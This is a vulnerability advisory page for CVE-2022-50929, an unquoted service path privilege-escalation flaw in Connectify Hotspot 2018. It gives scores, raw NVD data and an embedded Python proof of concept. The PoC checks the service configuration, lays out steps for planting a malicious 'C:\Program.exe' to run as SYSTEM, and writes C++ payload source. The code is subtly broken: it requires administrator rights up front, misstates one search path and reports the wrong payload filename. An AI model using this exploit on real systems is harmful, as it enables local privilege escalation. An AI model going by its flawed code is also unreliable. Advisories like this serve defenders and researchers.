Security Vulnerability Report
中文
CVE-2022-50929 CVSS 8.4 HIGH

CVE-2022-50929

Published: 2026-01-13 23:15:57
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Connectify Hotspot 2018 contains an unquoted service path vulnerability in its ConnectifyService executable that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\Program Files (x86)\Connectify\ConnectifyService.exe' to inject malicious executables and escalate privileges.

CVSS Details

CVSS Score
8.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Connectify Hotspot 2018 < 修复版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2022-50929 PoC - Connectify Hotspot Unquoted Service Path # This PoC demonstrates the unquoted service path vulnerability in Connectify Hotspot # Author: Security Researcher # Date: 2022 import os import sys import subprocess import ctypes def check_privileges(): """Check if running with administrator privileges""" try: is_admin = ctypes.windll.shell32.IsUserAnAdmin() return is_admin != 0 except: return False def check_vulnerable_service(): """Check if ConnectifyService is installed and vulnerable""" try: result = subprocess.run( ['sc', 'qc', 'ConnectifyService'], capture_output=True, text=True ) if result.returncode == 0: output = result.stdout if 'BINARY_PATH_NAME' in output: # Check if path is unquoted for line in output.split('\n'): if 'BINARY_PATH_NAME' in line: path = line.split(':', 1)[1].strip() if '"' not in path and ('Program Files' in path or 'Connectify' in path): print(f"[VULNERABLE] Unquoted path detected: {path}") return True, path return False, None except Exception as e: print(f"Error checking service: {e}") return False, None def create_payload(payload_path): """Create a simple payload that writes to a log file""" try: # Simple C++ payload that executes calc.exe and logs activity payload_code = ''' #include <windows.h> #include <fstream> using namespace std; int main() { // Log exploitation attempt ofstream logFile("C:\\\\exploit_log.txt", ios::app); logFile << "[!] Exploit executed at " << __TIME__ << endl; logFile.close(); // Execute calc.exe as demonstration system("calc.exe"); return 0; } ''' with open(payload_path.replace('.exe', '.cpp'), 'w') as f: f.write(payload_code) print(f"[+] Payload source code written to {payload_path}.cpp") print("[!] Compile the payload and name it 'Program.exe'") return True except Exception as e: print(f"Error creating payload: {e}") return False def main(): print("="*60) print("CVE-2022-50929 PoC - Connectify Hotspot Unquoted Service Path") print("="*60) if not check_privileges(): print("[-] This exploit requires administrator privileges") print("[*] Please run as administrator") sys.exit(1) print("[+] Running with administrator privileges") is_vulnerable, service_path = check_vulnerable_service() if is_vulnerable: print(f"[+] ConnectifyService is VULNERABLE") print(f"[+] Service path: {service_path}") print("\n[*] Attack vector:") print(" 1. Place malicious 'Program.exe' in C:\\") print(" 2. Wait for service restart or system reboot") print(" 3. Malicious code executes with SYSTEM privileges") # Demonstrate the attack path attack_path = r"C:\Program Files (x86)\Connectify\ConnectifyService.exe" print(f"\n[*] Vulnerable path breakdown:") print(f" {attack_path}") print(f" -> System tries: C:\Program.exe (first)") print(f" -> Then: C:\Program Files\ConnectifyService.exe") print(f" -> Finally: C:\Program Files (x86)\Connectify\ConnectifyService.exe") # Create payload create_payload(r"C:\Program.exe") else: print("[-] ConnectifyService is not vulnerable or not installed") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50929", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:57.407", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Connectify Hotspot 2018 contains an unquoted service path vulnerability in its ConnectifyService executable that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\\Program Files (x86)\\Connectify\\ConnectifyService.exe' to inject malicious executables and escalate privileges."}, {"lang": "es", "value": "Connectify Hotspot 2018 contiene una vulnerabilidad de ruta de servicio sin comillas en su ejecutable ConnectifyService que permite a atacantes locales ejecutar potencialmente código arbitrario. Los atacantes pueden explotar la ruta sin comillas en 'C:\\Program Files (x86)\\Connectify\\ConnectifyService.exe' para inyectar ejecutables maliciosos y escalar privilegios."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.connectify.me/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/50764", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/connectify-hotspot-connectifyservice-unquoted-service-path", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.